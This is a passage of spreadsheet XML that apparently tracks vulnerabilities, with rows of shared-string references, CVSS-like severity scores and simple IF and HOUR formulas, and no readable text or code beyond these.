      <c r="P92" s="4"/>
      <c r="Q92" s="13">
        <f>HOUR(out!$P92 -out!$N92)</f>
        <v>0</v>
      </c>
      <c r="R92" s="18"/>
      <c r="S92" s="4"/>
      <c r="T92" s="4"/>
      <c r="U92" s="4"/>
      <c r="V92" s="7"/>
    </row>
    <row r="93" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A93" s="3" t="s">
        <v>475</v>
      </c>
      <c r="B93" s="4" t="s">
        <v>905</v>
      </c>
      <c r="C93" s="4" t="s">
        <v>906</v>
      </c>
      <c r="D93" s="4" t="s">
        <v>907</v>
      </c>
      <c r="E93" s="4" t="s">
        <v>908</v>
      </c>
      <c r="F93" s="4" t="s">
        <v>909</v>
      </c>
      <c r="G93" s="4" t="s">
        <v>910</v>
      </c>
      <c r="H93" s="4">
        <v>4.3</v>
      </c>
      <c r="I93" s="4" t="s">
        <v>40</v>
      </c>
      <c r="J93" s="4"/>
      <c r="K93" s="4"/>
      <c r="L93" s="4">
        <f>IF(out!$G93="None",1,0)</f>
        <v>0</v>
      </c>
      <c r="M93" s="4"/>
      <c r="N93" s="4"/>
      <c r="O93" s="13"/>
      <c r="P93" s="4"/>
      <c r="Q93" s="13">
        <f>HOUR(out!$P93 -out!$N93)</f>
        <v>0</v>
      </c>
      <c r="R93" s="18"/>
      <c r="S93" s="4"/>
      <c r="T93" s="4"/>
      <c r="U93" s="4"/>
      <c r="V93" s="7"/>
    </row>
    <row r="94" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A94" s="3" t="s">
        <v>780</v>
      </c>
      <c r="B94" s="4" t="s">
        <v>911</v>
      </c>
      <c r="C94" s="4" t="s">
        <v>912</v>
      </c>
      <c r="D94" s="4" t="s">
        <v>913</v>
      </c>
      <c r="E94" s="4" t="s">
        <v>914</v>
      </c>
      <c r="F94" s="4" t="s">
        <v>915</v>
      </c>
      <c r="G94" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H94" s="4">
        <v>4.3</v>
      </c>
      <c r="I94" s="4" t="s">
        <v>40</v>
      </c>
      <c r="J94" s="4"/>
      <c r="K94" s="4"/>
      <c r="L94" s="4">
        <f>IF(out!$G94="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M94" s="4"/>
      <c r="N94" s="4"/>
      <c r="O94" s="13"/>
      <c r="P94" s="4"/>
      <c r="Q94" s="13">
        <f>HOUR(out!$P94 -out!$N94)</f>
        <v>0</v>
      </c>
      <c r="R94" s="18"/>
      <c r="S94" s="4"/>
      <c r="T94" s="4"/>
      <c r="U94" s="4"/>
      <c r="V94" s="7"/>
    </row>
    <row r="95" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A95" s="3" t="s">
        <v>916</v>
      </c>
      <c r="B95" s="4" t="s">
        <v>917</v>
      </c>
      <c r="C95" s="4" t="s">
        <v>918</v>
      </c>
      <c r="D95" s="4" t="s">
        <v>919</v>
      </c>
      <c r="E95" s="4" t="s">
        <v>920</v>
      </c>
      <c r="F95" s="4" t="s">
        <v>921</v>
      </c>
      <c r="G95" s="4" t="s">
        <v>922</v>
      </c>
      <c r="H95" s="4">
        <v>9.1</v>
      </c>
      <c r="I95" s="4" t="s">
        <v>85</v>
      </c>
      <c r="J95" s="4"/>
      <c r="K95" s="4"/>
      <c r="L95" s="4">
        <f>IF(out!$G95="None",1,0)</f>
        <v>0</v>
      </c>
      <c r="M95" s="4"/>
      <c r="N95" s="4"/>
      <c r="O95" s="13"/>
      <c r="P95" s="4"/>
      <c r="Q95" s="13">
        <f>HOUR(out!$P95 -out!$N95)</f>
        <v>0</v>
      </c>
      <c r="R95" s="18"/>
      <c r="S95" s="4"/>
      <c r="T95" s="4"/>
      <c r="U95" s="4"/>
      <c r="V95" s="7"/>
    </row>
    <row r="96" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A96" s="3" t="s">
        <v>780</v>
      </c>
      <c r="B96" s="4" t="s">
        <v>935</v>
      </c>
      <c r="C96" s="4" t="s">
        <v>936</v>
      </c>
      <c r="D96" s="4" t="s">
        <v>937</v>
      </c>
      <c r="E96" s="4" t="s">
        <v>938</v>
      </c>
      <c r="F96" s="4" t="s">
        <v>38</v>
      </c>
      <c r="G96" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H96" s="4">
        <v>7.5</v>
      </c>
      <c r="I96" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J96" s="4"/>
      <c r="K96" s="4"/>
      <c r="L96" s="4">
        <f>IF(out!$G96="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M96" s="4"/>
      <c r="N96" s="4"/>
      <c r="O96" s="13"/>
      <c r="P96" s="4"/>
      <c r="Q96" s="13">
        <f>HOUR(out!$P96 -out!$N96)</f>
        <v>0</v>
      </c>
      <c r="R96" s="18"/>
      <c r="S96" s="4"/>
      <c r="T96" s="4"/>
      <c r="U96" s="4"/>
      <c r="V96" s="7"/>
    </row>
    <row r="97" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A97" s="3" t="s">
        <v>475</v>
      </c>
      <c r="B97" s="4" t="s">
        <v>939</v>
      </c>
      <c r="C97" s="4" t="s">
        <v>940</v>
      </c>
      <c r="D97" s="4" t="s">
        <v>941</v>
      </c>
      <c r="E97" s="4" t="s">
        <v>942</v>
      </c>
      <c r="F97" s="4" t="s">
        <v>943</v>
      </c>
      <c r="G97" s="4" t="s">
        <v>55</v>
      </c>
      <c r="H97" s="4">
        <v>5.3</v>
      </c>
      <c r="I97" s="4" t="s">
        <v>40</v>
      </c>
      <c r="J97" s="4"/>
      <c r="K97" s="4"/>
      <c r="L97" s="4">
        <f>IF(out!$G97="None",1,0)</f>
        <v>0</v>
      </c>
      <c r="M97" s="4"/>
      <c r="N97" s="4"/>
      <c r="O97" s="13"/>
      <c r="P97" s="4"/>
      <c r="Q97" s="13">
        <f>HOUR(out!$P97 -out!$N97)</f>
        <v>0</v>
      </c>
      <c r="R97" s="18"/>
      <c r="S97" s="4"/>
      <c r="T97" s="4"/>
      <c r="U97" s="4"/>
      <c r="V97" s="7"/>
    </row>
    <row r="98" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A98" s="3" t="s">
        <v>944</v>
      </c>
      <c r="B98" s="4" t="s">
        <v>945</v>
      </c>
      <c r="C98" s="4" t="s">
        <v>946</v>
      </c>
      <c r="D98" s="4" t="s">
        <v>947</v>
      </c>
      <c r="E98" s="4" t="s">
        <v>948</v>
      </c>
      <c r="F98" s="4" t="s">
        <v>949</v>
      </c>
      <c r="G98" s="4" t="s">
        <v>950</v>
      </c>
      <c r="H98" s="4">
        <v>9.8000000000000007</v>
      </c>
      <c r="I98" s="4" t="s">
        <v>85</v>
      </c>
      <c r="J98" s="4"/>
      <c r="K98" s="4"/>
      <c r="L98" s="4">
        <f>IF(out!$G98="None",1,0)</f>
        <v>0</v>
      </c>
      <c r="M98" s="4"/>
      <c r="N98" s="4"/>
      <c r="O98" s="13"/>
      <c r="P98" s="4"/>
      <c r="Q98" s="13">
        <f>HOUR(out!$P98 -out!$N98)</f>
        <v>0</v>
      </c>
      <c r="R98" s="18"/>
      <c r="S98" s="4"/>
      <c r="T98" s="4"/>
      <c r="U98" s="4"/>
      <c r="V98" s="7"/>
    </row>
    <row r="99" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A99" s="3" t="s">
        <v>944</v>
      </c>
      <c r="B99" s="4" t="s">
        <v>951</v>
      </c>
      <c r="C99" s="4" t="s">
        <v>952</v>
      </c>
      <c r="D99" s="4" t="s">
        <v>947</v>
      </c>
      <c r="E99" s="4" t="s">
        <v>948</v>
      </c>
      <c r="F99" s="4" t="s">
        <v>949</v>
      </c>
      <c r="G99" s="4" t="s">
        <v>950</v>
      </c>
      <c r="H99" s="4">
        <v>9.8000000000000007</v>
      </c>
      <c r="I99" s="4" t="s">
        <v>85</v>
      </c>
      <c r="J99" s="4"/>
      <c r="K99" s="4"/>
      <c r="L99" s="4">
        <f>IF(out!$G99="None",1,0)</f>
        <v>0</v>
      </c>
      <c r="M99" s="4"/>
      <c r="N99" s="4"/>
      <c r="O99" s="13"/>
      <c r="P99" s="4"/>
      <c r="Q99" s="13">
        <f>HOUR(out!$P99 -out!$N99)</f>
        <v>0</v>
      </c>
      <c r="R99" s="18"/>
      <c r="S99" s="4"/>
      <c r="T99" s="4"/>
      <c r="U99" s="4"/>
      <c r="V99" s="7"/>
    </row>
    <row r="100" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A100" s="3" t="s">
        <v>481</v>
      </c>
      <c r="B100" s="4" t="s">
        <v>953</v>
      </c>
      <c r="C100" s="4" t="s">
        <v>954</v>
      </c>
      <c r="D100" s="4" t="s">
        <v>955</v>
      </c>
      <c r="E100" s="4" t="s">
        <v>956</v>
      </c>
      <c r="F100" s="4" t="s">
        <v>957</v>
      </c>
      <c r="G100" s="4" t="s">
        <v>958</v>
      </c>
      <c r="H100" s="4">
        <v>7.5</v>
      </c>
      <c r="I100" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J100" s="4"/>
      <c r="K100" s="4"/>
      <c r="L100" s="4">
        <f>IF(out!$G100="None",1,0)</f>
        <v>0</v>
      </c>
      <c r="M100" s="4"/>
      <c r="N100" s="4"/>
      <c r="O100" s="13"/>
      <c r="P100" s="4"/>
      <c r="Q100" s="13">
        <f>HOUR(out!$P100 -out!$N100)</f>
        <v>0</v>
      </c>
      <c r="R100" s="18"/>
      <c r="S100" s="4"/>
      <c r="T100" s="4"/>
      <c r="U100" s="4"/>
      <c r="V100" s="7"/>
    </row>
    <row r="101" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A101" s="3" t="s">
        <v>475</v>
      </c>
      <c r="B101" s="4" t="s">
        <v>959</v>
      </c>
      <c r="C101" s="4" t="s">
        <v>960</v>
      </c>
      <c r="D101" s="4" t="s">
        <v>961</v>
      </c>
      <c r="E101" s="4" t="s">
        <v>962</v>
      </c>
      <c r="F101" s="4" t="s">
        <v>963</v>
      </c>
      <c r="G101" s="4" t="s">
        <v>964</v>
      </c>
      <c r="H101" s="4">
        <v>7.5</v>
      </c>
      <c r="I101" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J101" s="4"/>
      <c r="K101" s="4"/>
      <c r="L101" s="4">
        <f>IF(out!$G101="None",1,0)</f>
        <v>0</v>
      </c>
      <c r="M101" s="4"/>
      <c r="N101" s="4"/>
      <c r="O101" s="13"/>
      <c r="P101" s="4"/>
      <c r="Q101" s="13">
        <f>HOUR(out!$P101 -out!$N101)</f>
        <v>0</v>
      </c>
      <c r="R101" s="18"/>
      <c r="S101" s="4"/>
      <c r="T101" s="4"/>
      <c r="U101" s="4"/>
      <c r="V101" s="7"/>
    </row>
    <row r="102" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A102" s="3" t="s">
        <v>965</v>
      </c>
      <c r="B102" s="4" t="s">
        <v>966</v>
      </c>
      <c r="C102" s="4" t="s">
        <v>967</v>
      </c>
      <c r="D102" s="4" t="s">
        <v>968</v>
      </c>
      <c r="E102" s="4" t="s">
        <v>969</v>
      </c>
      <c r="F102" s="4" t="s">
        <v>38</v>
      </c>
      <c r="G102" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H102" s="4"/>
      <c r="I102" s="4"/>
      <c r="J102" s="4"/>
      <c r="K102" s="4"/>
      <c r="L102" s="4">
        <f>IF(out!$G102="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M102" s="4"/>
      <c r="N102" s="4"/>
      <c r="O102" s="13"/>
      <c r="P102" s="4"/>
      <c r="Q102" s="13">
        <f>HOUR(out!$P102 -out!$N102)</f>
        <v>0</v>
      </c>
      <c r="R102" s="18"/>
      <c r="S102" s="4"/>
      <c r="T102" s="4"/>
      <c r="U102" s="4"/>
      <c r="V102" s="7"/>
    </row>
    <row r="103" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A103" s="3" t="s">
        <v>780</v>
      </c>
      <c r="B103" s="4" t="s">
        <v>970</v>
      </c>
      <c r="C103" s="4" t="s">
        <v>971</v>
      </c>
      <c r="D103" s="4" t="s">
        <v>972</v>
      </c>
      <c r="E103" s="4" t="s">
        <v>973</v>
      </c>
      <c r="F103" s="4" t="s">
        <v>38</v>
      </c>
      <c r="G103" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H103" s="4">
        <v>7.5</v>
      </c>
      <c r="I103" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J103" s="4"/>
      <c r="K103" s="4"/>
      <c r="L103" s="4">
        <f>IF(out!$G103="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M103" s="4"/>
      <c r="N103" s="4"/>
      <c r="O103" s="13"/>
      <c r="P103" s="4"/>
      <c r="Q103" s="13">
        <f>HOUR(out!$P103 -out!$N103)</f>
        <v>0</v>
      </c>
      <c r="R103" s="18"/>
      <c r="S103" s="4"/>
      <c r="T103" s="4"/>
      <c r="U103" s="4"/>
      <c r="V103" s="7"/>
    </row>
    <row r="104" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A104" s="3" t="s">
        <v>780</v>
      </c>
      <c r="B104" s="4" t="s">
        <v>974</v>
      </c>
      <c r="C104" s="4" t="s">
        <v>975</v>
      </c>
      <c r="D104" s="4" t="s">
        <v>976</v>
      </c>
      <c r="E104" s="4" t="s">
        <v>977</v>
      </c>
      <c r="F104" s="4" t="s">
        <v>38</v>
      </c>
      <c r="G104" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H104" s="4">
        <v>7.5</v>
      </c>
      <c r="I104" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J104" s="4"/>
      <c r="K104" s="4"/>
      <c r="L104" s="4">
        <f>IF(out!$G104="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M104" s="4"/>
      <c r="N104" s="4"/>
      <c r="O104" s="13"/>
      <c r="P104" s="4"/>
      <c r="Q104" s="13">
        <f>HOUR(out!$P104 -out!$N104)</f>
        <v>0</v>
      </c>
      <c r="R104" s="18"/>
      <c r="S104" s="4"/>
      <c r="T104" s="4"/>
      <c r="U104" s="4"/>
      <c r="V104" s="7"/>
    </row>
    <row r="105" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A105" s="3" t="s">
        <v>780</v>
      </c>
      <c r="B105" s="4" t="s">
        <v>978</v>
      </c>
      <c r="C105" s="4" t="s">
        <v>979</v>
      </c>
      <c r="D105" s="4" t="s">
        <v>980</v>
      </c>
      <c r="E105" s="4" t="s">
        <v>981</v>
      </c>
      <c r="F105" s="4" t="s">
        <v>38</v>
      </c>
      <c r="G105" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H105" s="4">
        <v>7.5</v>
      </c>
      <c r="I105" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J105" s="4"/>
      <c r="K105" s="4"/>
      <c r="L105" s="4">
        <f>IF(out!$G105="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M105" s="4"/>
      <c r="N105" s="4"/>
      <c r="O105" s="13"/>
      <c r="P105" s="4"/>
      <c r="Q105" s="13">
        <f>HOUR(out!$P105 -out!$N105)</f>
        <v>0</v>
      </c>
      <c r="R105" s="18"/>
      <c r="S105" s="4"/>
      <c r="T105" s="4"/>
      <c r="U105" s="4"/>
      <c r="V105" s="7"/>
    </row>
    <row r="106" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A106" s="3" t="s">
        <v>982</v>
      </c>
      <c r="B106" s="4" t="s">
        <v>983</v>
      </c>
      <c r="C106" s="4" t="s">
        <v>984</v>
      </c>
      <c r="D106" s="4" t="s">
        <v>985</v>
      </c>
      <c r="E106" s="4" t="s">
        <v>986</v>
      </c>
      <c r="F106" s="4" t="s">
        <v>987</v>
      </c>
      <c r="G106" s="4" t="s">
        <v>55</v>
      </c>
      <c r="H106" s="4">
        <v>6.2</v>
      </c>
      <c r="I106" s="4" t="s">
        <v>40</v>
      </c>
      <c r="J106" s="4"/>
      <c r="K106" s="4"/>
      <c r="L106" s="4">
        <f>IF(out!$G106="None",1,0)</f>
        <v>0</v>
      </c>
      <c r="M106" s="4"/>
      <c r="N106" s="4"/>
      <c r="O106" s="13"/>
      <c r="P106" s="4"/>
      <c r="Q106" s="13">
        <f>HOUR(out!$P106 -out!$N106)</f>
        <v>0</v>
      </c>
      <c r="R106" s="18"/>
      <c r="S106" s="4"/>
      <c r="T106" s="4"/>
      <c r="U106" s="4"/>
      <c r="V106" s="7"/>
    </row>
    <row r="107" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A107" s="3" t="s">
        <v>988</v>
      </c>
      <c r="B107" s="4" t="s">
        <v>989</v>
      </c>
      <c r="C107" s="4" t="s">
        <v>990</v>
      </c>
      <c r="D107" s="4" t="s">
        <v>991</v>
      </c>
      <c r="E107" s="4" t="s">
        <v>992</v>
      </c>
      <c r="F107" s="4" t="s">
        <v>993</v>
      </c>
      <c r="G107" s="4" t="s">
        <v>994</v>
      </c>
      <c r="H107" s="4">
        <v>8.1999999999999993</v>
      </c>
      <c r="I107" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J107" s="4"/>
      <c r="K107" s="4"/>
      <c r="L107" s="4">
        <f>IF(out!$G107="None",1,0)</f>
        <v>0</v>
      </c>
      <c r="M107" s="4"/>
      <c r="N107" s="4"/>
      <c r="O107" s="13"/>
      <c r="P107" s="4"/>
      <c r="Q107" s="13">
        <f>HOUR(out!$P107 -out!$N107)</f>
        <v>0</v>
      </c>
      <c r="R107" s="18"/>
      <c r="S107" s="4"/>
      <c r="T107" s="4"/>
      <c r="U107" s="4"/>
      <c r="V107" s="7"/>
    </row>
    <row r="108" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A108" s="3" t="s">
        <v>995</v>
      </c>
      <c r="B108" s="4" t="s">
        <v>996</v>
      </c>
      <c r="C108" s="4" t="s">
        <v>997</v>
      </c>
      <c r="D108" s="4" t="s">
        <v>998</v>
      </c>
      <c r="E108" s="4" t="s">
        <v>999</v>
      </c>
      <c r="F108" s="4" t="s">
        <v>1000</v>
      </c>
      <c r="G108" s="4" t="s">
        <v>1001</v>
      </c>
      <c r="H108" s="4">
        <v>4.3</v>
      </c>
      <c r="I108" s="4" t="s">
        <v>40</v>
      </c>
      <c r="J108" s="4"/>
      <c r="K108" s="4"/>
      <c r="L108" s="4">
        <f>IF(out!$G108="None",1,0)</f>
        <v>0</v>
      </c>
      <c r="M108" s="4"/>
      <c r="N108" s="4"/>
      <c r="O108" s="13"/>
      <c r="P108" s="4"/>
      <c r="Q108" s="13">
        <f>HOUR(out!$P108 -out!$N108)</f>
        <v>0</v>
      </c>
      <c r="R108" s="18"/>
      <c r="S108" s="4"/>
      <c r="T108" s="4"/>
      <c r="U108" s="4"/>
      <c r="V108" s="7"/>
    </row>
    <row r="109" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A109" s="3" t="s">
        <v>780</v>
      </c>
      <c r="B109" s="4" t="s">
        <v>1002</v>
      </c>
      <c r="C109" s="4" t="s">
        <v>1003</v>
      </c>
      <c r="D109" s="4" t="s">
        <v>1004</v>
      </c>
      <c r="E109" s="4" t="s">
        <v>1005</v>
      </c>
      <c r="F109" s="4" t="s">
        <v>873</v>
      </c>
      <c r="G109" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H109" s="4">
        <v>7.5</v>
      </c>
      <c r="I109" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J109" s="4"/>
      <c r="K109" s="4"/>
      <c r="L109" s="4">
        <f>IF(out!$G109="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M109" s="4"/>
      <c r="N109" s="4"/>
      <c r="O109" s="13"/>
      <c r="P109" s="4"/>
      <c r="Q109" s="13">
        <f>HOUR(out!$P109 -out!$N109)</f>
        <v>0</v>
      </c>
      <c r="R109" s="18"/>
      <c r="S109" s="4"/>
      <c r="T109" s="4"/>
      <c r="U109" s="4"/>
      <c r="V109" s="7"/>
    </row>
    <row r="110" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A110" s="3" t="s">
        <v>780</v>
      </c>
      <c r="B110" s="4" t="s">
        <v>1006</v>
      </c>
      <c r="C110" s="4" t="s">
        <v>1007</v>
      </c>
      <c r="D110" s="4" t="s">
        <v>1008</v>
      </c>
      <c r="E110" s="4" t="s">
        <v>1009</v>
      </c>
      <c r="F110" s="4" t="s">
        <v>38</v>
      </c>
      <c r="G110" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H110" s="4">
        <v>5.3</v>
      </c>
      <c r="I110" s="4" t="s">
        <v>40</v>
      </c>
      <c r="J110" s="4"/>
      <c r="K110" s="4"/>
      <c r="L110" s="4">
        <f>IF(out!$G110="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M110" s="4"/>
      <c r="N110" s="4"/>
      <c r="O110" s="13"/>
      <c r="P110" s="4"/>
      <c r="Q110" s="13">
        <f>HOUR(out!$P110 -out!$N110)</f>
        <v>0</v>
      </c>
      <c r="R110" s="18"/>
      <c r="S110" s="4"/>
      <c r="T110" s="4"/>
      <c r="U110" s="4"/>
      <c r="V110" s="7"/>
    </row>
    <row r="111" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A111" s="3" t="s">
        <v>780</v>
      </c>
      <c r="B111" s="4" t="s">
        <v>1010</v>
      </c>
      <c r="C111" s="4" t="s">
        <v>1011</v>
      </c>
      <c r="D111" s="4" t="s">
        <v>1012</v>
      </c>
      <c r="E111" s="4" t="s">
        <v>1013</v>
      </c>
      <c r="F111" s="4" t="s">
        <v>38</v>
      </c>
      <c r="G111" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H111" s="4">
        <v>7.5</v>
      </c>
      <c r="I111" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J111" s="4"/>
      <c r="K111" s="4"/>
      <c r="L111" s="4">
        <f>IF(out!$G111="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M111" s="4"/>
      <c r="N111" s="4"/>
      <c r="O111" s="13"/>
      <c r="P111" s="4"/>
      <c r="Q111" s="13">
        <f>HOUR(out!$P111 -out!$N111)</f>
        <v>0</v>
      </c>
      <c r="R111" s="18"/>
      <c r="S111" s="4"/>
      <c r="T111" s="4"/>
      <c r="U111" s="4"/>
      <c r="V111" s="7"/>
    </row>
    <row r="112" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A112" s="3" t="s">
        <v>780</v>
      </c>
      <c r="B112" s="4" t="s">
        <v>1014</v>
      </c>
      <c r="C112" s="4" t="s">
        <v>1015</v>
      </c>
      <c r="D112" s="4" t="s">
        <v>1016</v>
      </c>
      <c r="E112" s="4" t="s">
        <v>1017</v>
      </c>
      <c r="F112" s="4" t="s">
        <v>38</v>
      </c>
      <c r="G112" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H112" s="4">
        <v>7.5</v>
      </c>
      <c r="I112" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J112" s="4"/>
      <c r="K112" s="4"/>
      <c r="L112" s="4">
        <f>IF(out!$G112="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M112" s="4"/>
      <c r="N112" s="4"/>
      <c r="O112" s="13"/>
      <c r="P112" s="4"/>
      <c r="Q112" s="13">
        <f>HOUR(out!$P112 -out!$N112)</f>
        <v>0</v>
      </c>
      <c r="R112" s="18"/>
      <c r="S112" s="4"/>
      <c r="T112" s="4"/>
      <c r="U112" s="4"/>
      <c r="V112" s="7"/>
    </row>
    <row r="113" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A113" s="3" t="s">
        <v>780</v>
      </c>
      <c r="B113" s="4" t="s">
        <v>1018</v>
      </c>
      <c r="C113" s="4" t="s">
        <v>1019</v>
      </c>
      <c r="D113" s="4" t="s">
        <v>1020</v>
      </c>
      <c r="E113" s="4" t="s">
        <v>1021</v>
      </c>
      <c r="F113" s="4" t="s">
        <v>38</v>
      </c>
      <c r="G113" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H113" s="4">
        <v>7.5</v>
      </c>
      <c r="I113" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J113" s="4"/>
      <c r="K113" s="4"/>
      <c r="L113" s="4">
        <f>IF(out!$G113="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M113" s="4"/>
      <c r="N113" s="4"/>
      <c r="O113" s="13"/>
      <c r="P113" s="4"/>
      <c r="Q113" s="13">
        <f>HOUR(out!$P113 -out!$N113)</f>
        <v>0</v>
      </c>
      <c r="R113" s="18"/>
      <c r="S113" s="4"/>
      <c r="T113" s="4"/>
      <c r="U113" s="4"/>
      <c r="V113" s="7"/>
    </row>
    <row r="114" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A114" s="3" t="s">
        <v>780</v>
      </c>
      <c r="B114" s="4" t="s">
        <v>1022</v>
      </c>
      <c r="C114" s="4" t="s">
        <v>1023</v>
      </c>
      <c r="D114" s="4" t="s">
        <v>1024</v>
      </c>
      <c r="E114" s="4" t="s">
        <v>1025</v>
      </c>
      <c r="F114" s="4" t="s">
        <v>38</v>
      </c>
      <c r="G114" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H114" s="4">
        <v>7.5</v>
      </c>
      <c r="I114" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J114" s="4"/>
      <c r="K114" s="4"/>
      <c r="L114" s="4">
        <f>IF(out!$G114="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M114" s="4"/>
      <c r="N114" s="4"/>
      <c r="O114" s="13"/>
      <c r="P114" s="4"/>
      <c r="Q114" s="13">
        <f>HOUR(out!$P114 -out!$N114)</f>
        <v>0</v>
      </c>
      <c r="R114" s="18"/>
      <c r="S114" s="4"/>
      <c r="T114" s="4"/>
      <c r="U114" s="4"/>
      <c r="V114" s="7"/>
    </row>
    <row r="115" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A115" s="3" t="s">
        <v>780</v>
      </c>
      <c r="B115" s="4" t="s">
        <v>1026</v>
      </c>
      <c r="C115" s="4" t="s">
        <v>1027</v>
      </c>
      <c r="D115" s="4" t="s">
        <v>1028</v>
      </c>
      <c r="E115" s="4" t="s">
        <v>1029</v>
      </c>
      <c r="F115" s="4" t="s">
        <v>873</v>
      </c>
      <c r="G115" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H115" s="4">
        <v>7.5</v>
      </c>
      <c r="I115" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J115" s="4"/>
      <c r="K115" s="4"/>
      <c r="L115" s="4">
        <f>IF(out!$G115="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M115" s="4"/>
      <c r="N115" s="4"/>
      <c r="O115" s="13"/>
      <c r="P115" s="4"/>
      <c r="Q115" s="13">
        <f>HOUR(out!$P115 -out!$N115)</f>
        <v>0</v>
      </c>
      <c r="R115" s="18"/>
      <c r="S115" s="4"/>
      <c r="T115" s="4"/>
      <c r="U115" s="4"/>
      <c r="V115" s="7"/>
    </row>
    <row r="116" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A116" s="3" t="s">
        <v>780</v>
      </c>
      <c r="B116" s="4" t="s">
        <v>1030</v>
      </c>
      <c r="C116" s="4" t="s">
        <v>1031</v>
      </c>
      <c r="D116" s="4" t="s">
        <v>1032</v>
      </c>
      <c r="E116" s="4" t="s">
        <v>1033</v>
      </c>
      <c r="F116" s="4" t="s">
        <v>38</v>
      </c>
      <c r="G116" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H116" s="4">
        <v>7.5</v>
      </c>
      <c r="I116" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J116" s="4"/>
      <c r="K116" s="4"/>
      <c r="L116" s="4">
        <f>IF(out!$G116="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M116" s="4"/>
      <c r="N116" s="4"/>
      <c r="O116" s="13"/>
      <c r="P116" s="4"/>
      <c r="Q116" s="13">
        <f>HOUR(out!$P116 -out!$N116)</f>
        <v>0</v>
      </c>
      <c r="R116" s="18"/>
      <c r="S116" s="4"/>
      <c r="T116" s="4"/>
      <c r="U116" s="4"/>
      <c r="V116" s="7"/>
    </row>
    <row r="117" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A117" s="3" t="s">
        <v>780</v>
      </c>
      <c r="B117" s="4" t="s">
        <v>1034</v>
      </c>
      <c r="C117" s="4" t="s">
        <v>1035</v>
      </c>
      <c r="D117" s="4" t="s">
        <v>1036</v>
      </c>
      <c r="E117" s="4" t="s">
        <v>1037</v>
      </c>
      <c r="F117" s="4" t="s">
        <v>38</v>
      </c>
      <c r="G117" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H117" s="4">
        <v>7.5</v>
      </c>
      <c r="I117" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J117" s="4"/>
      <c r="K117" s="4"/>
      <c r="L117" s="4">
        <f>IF(out!$G117="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M117" s="4"/>
      <c r="N117" s="4"/>
      <c r="O117" s="13"/>
      <c r="P117" s="4"/>
      <c r="Q117" s="13">
        <f>HOUR(out!$P117 -out!$N117)</f>
        <v>0</v>
      </c>
      <c r="R117" s="18"/>
      <c r="S117" s="4"/>
      <c r="T117" s="4"/>
      <c r="U117" s="4"/>
      <c r="V117" s="7"/>
    </row>
